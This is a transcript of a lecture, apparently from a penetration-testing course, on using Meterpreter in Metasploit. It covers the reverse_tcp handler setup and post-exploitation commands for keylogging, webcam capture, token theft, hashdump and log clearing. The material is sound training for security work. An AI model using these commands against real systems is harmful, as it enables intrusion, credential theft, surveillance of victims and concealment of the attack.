Meterpreter, a crowd favorite for payloads. So we've talked about bind and reverse payloads, and now we're gonna talk about Meterpreter. So Meterpreter is gonna be used in our gaining access, and then we're gonna use that throughout the rest of our stages: our escalation of privilege, maintaining access, and covering our tracks and setting our back doors. Now, what is Meterpreter? Meterpreter is a multi-faceted payload that operates via a Dynamic Link Library injection, so a DLL injection. And it's included as part of our Metasploit Framework, which is that MSF that we're using inside Kali Linux. That's gonna allow us to load it and attack onto a victim platform. The nice thing about Meterpreter is that it resides in volatile memory of the target and it leaves no traces on the hard drive. So it's difficult to detect when you're using conventional forensic techniques, which makes it great for us as an attacker, not so great for us if we're the defenders. The nice thing about Meterpreter is that it uses DLL injection to get exploited processes, this getpid.

Now what happens is it's gonna actually hook the Windows 32 API LoadLibrary, and by doing that it's gonna change these lower-level APIs inside of Windows to allow us to load the metsrv DLL from memory. By keeping it all in memory, it keeps it out of the logs, it keeps it off the hard drive, it makes it very hard for the defenders to go back and find it afterwards. The other great thing we're gonna find with Meterpreter is that it just has loads of functionality for us. So, when we set up Meterpreter, we're gonna do this inside the Metasploit Framework. So if we're inside the msf console, we're gonna do use exploit/multi/handler, we're gonna then set our payload, so set payload windows/meterpreter/reverse_tcp. We're gonna set our host and our port, so that's our Kali IP and whatever port we're gonna use, 2541, 4444, 443, whatever it is, and then we're gonna do our exploit. Now, once we've set our payload, our listening host, and listening port, we'll be able to receive a callback from our exploited host. Now once you get into Meterpreter, you'll see there's a ton of different commands.

Now I'm not gonna show you all of them, but if you wanna see them all just type help or "?" once you get to a Meterpreter prompt. So, background is gonna move the current session to the background, and this is gonna allow us to hack multiple boxes at once. So, if I have a first exploited target, I can type "background," set up a second attack, go after a second box, and then background that and go back to the first one. And I can go between multiple different targets at one time. This is very useful to be able to interact with background sessions. Sessions: if I type in sessions, I'll be able to see all the active sessions I have. So again, I can have two, three, four different targets online, and have active connections with each of them, and then switch between them. I can also kill those sessions, kill all of them, or kill specific sessions. So to do that, I'm gonna use sessions -i, and then the number; that's interact, so if I was gonna interact with my first session, it'd be sessions -i 1. Then if I wanted to go to the other one, I'd type background, sessions -i 2, and that would get me to the second one. If I want to kill that connection, I would just type sessions -k 1, and that would kill the connection to one. If I want to kill all of them, it's sessions -K.

So some other Meterpreter commands that are helpful: the Help, the Load, the Migrate, and the Quit. So when you type in Help, you're gonna get the list of all the commands that Meterpreter understands. This is useful when you're first starting out to start learning how Meterpreter works and what different things there are that you can do. These screenshots you're seeing now come from that Help menu. Now, if we go into Migrate, that's gonna migrate our server from one process to another. Now when we talk about server, we're talking about the Meterpreter server. That's the connection that we have with our victim. So, we're gonna fork our Meterpreter into a different process. So, for instance, if my attack went in through Internet Explorer, that tends to crash a lot. So I would wanna migrate out of Internet Explorer into something more stable, like Explorer, which is the file system browser. You also can do this while you're doing your maintaining access and covering our tracks phases, we'll talk about that more later, to hide ourself, or to migrate into another process that might have better permissions that gives us higher-level access. So, here's an example of Migrate: so you'll see up top we have some legitimate processes, we have winlogon, lsass, service host, explorer, and web 32 res. Now, when I initially broke in, I'm gonna break in using a calc program, a calculator program, so therefore I'm now sitting in Calc. Now, if I migrate you're gonna see that the Calc is gonna go away, but I'm gonna maintain my access. And the way we do that is by doing Migrate, and we'll migrate from the PID of 3028 into where I wanna go, which might be the Explorer PID of 1064.

Some other nice things that Meterpreter allows you to do is you can download and upload files. You can also get your working directories and figure out where you are. Some exploits you do are not gonna give you the path name of where you are. So you're not gonna see this C:/32. You might just get a blank prompt. So by printing the working directory, I'll be able to figure out where I am on the victim's system. Now, the download and upload work just like they say. You type in download and a file name and it will take that file from the victim and bring it to your local Kali machine. That way, you can do that information gathering, and be able to use that as part of your exploitation later on. Some other commands we have, we have arp and ifconfig and ipconfig and netstat and port forwarding and route. We're gonna talk about more of these later on in other lectures as we start playing through some of these commands, but this is really just some of your networking commands that you have inside Meterpreter.

Here's some additional commands that we have inside Meterpreter. We have clearev. This is clearing your event log. This is useful during the covering your tracks phase. We also can drop tokens or steal tokens so that we can start pretending that we're some other user on the system. So for instance if I got onto a user box and the domain admin had also been on that box, I might be able to steal their token and impersonate them and start going around the network as if I was the domain admin. We can execute commands, we can get the PIDs so we know what process we're currently in, we can migrate into other processes, we can reboot the computer, we can revert ourself back to the initial user we were. We can drop into a shell. Just typing shell will get us to the C prompt, for instance. There's lots of different things that we can do and as you play with Meterpreter you're gonna get better and better at using it.

So one of the things I really like with Meterpreter is that it comes with built-in keystroke capturing. So, if I have gotten onto a user's machine, I can actually use keyscan_start, and start a keylogger on that machine. So if they start going into their bank accounts, their Facebook, their email, I start capturing all those keystrokes, the user names, the passwords, the things that they're writing. And when I go ahead and do a keyscan_dump I'll be able to see that on my screen. Some other things that you can do here is you can actually do a screenshot, and by doing a screenshot, you can actually capture what's on their screen and see what they're seeing, and you'll get that as a PNG image, and that'll be again on your local Kali machine, so you'll see what the victim is seeing. It allows you to see in our Graphical User Environment world what that user is seeing in their world. And so again, to use the keylogger, keyscan_start starts your keylogging, keyscan_stop stops your keylogging, keyscan_dump shows you those keystrokes that have been captured.

So, here's just a quick example on the screen of what it will look like in Meterpreter. Getuid will tell me what I am. In this case, I wanna be system. Ps tells me the processes that are open, and I'll be able to see what processes are there. Migrate pid will migrate me from the current process I'm in, that Internet Explorer process or Calc process, into something like Explorer or System. Getuid verifies where you should be. I wanna be the current user, because if I wanna capture somebody's keystrokes, I have to be them. So I have to migrate into a user process to do that. And now I'll be able to see if I go on a Notepad, start typing notepad on your victim box, and then you'll keyscan_dump, you'll be able to see all those keystrokes that you've had. You'll also see here that Meterpreter gives you the ability to actually access the webcam. You can record audio from the microphone of the webcam, you can see what webcams are available, and you can start taking snapshots from the webcam. So I can actually see the victim that I'm seeing through their computer. Now, ours is a virtual target. It doesn't have a webcam, so these will actually fail if you try it in our virtual lab, but in the real world, you can do this and start stealing pictures off their camera.

Another one is elevation commands. We talked about once we gain access we wanna migrate up to a higher user level. Well, one of the ways we do that is getsystem. It's just automated. You type getsystem, and on a Windows machine, it will elevate you up to a system-level user if it can. This works about 50% of the time, so it works pretty well and it's worth a shot. It will get you where you wanna go most of the time. So, some other ways that we can elevate our privileges is we can do a hashdump. Hashdump is actually gonna dump the contents of the SAM database, and we'll talk more about the SAM database when we talk about elevation of privilege later, but it's the way that Windows stores its credentials. So if I can dump the SAM database, I get the encrypted hash of all the passwords, I can then break those hashes and figure out what the passwords are, and I now have additional accesses. And then finally, here at the bottom you'll see timestomp, and timestomp's really useful because as we get into our covering our tracks later, we'll use timestomp to actually change the time that files were accessed. A good use of this is if I go into a logfile and edit a piece of that log, it's gonna change the date and time to the time that I edited it. Now what I wanna do is go back and timestamp it back to the last time it was actually touched, which might have been three or four weeks ago by the system administrator. And that way I can help cover my tracks further. We'll cover this again in the covering tracks lesson.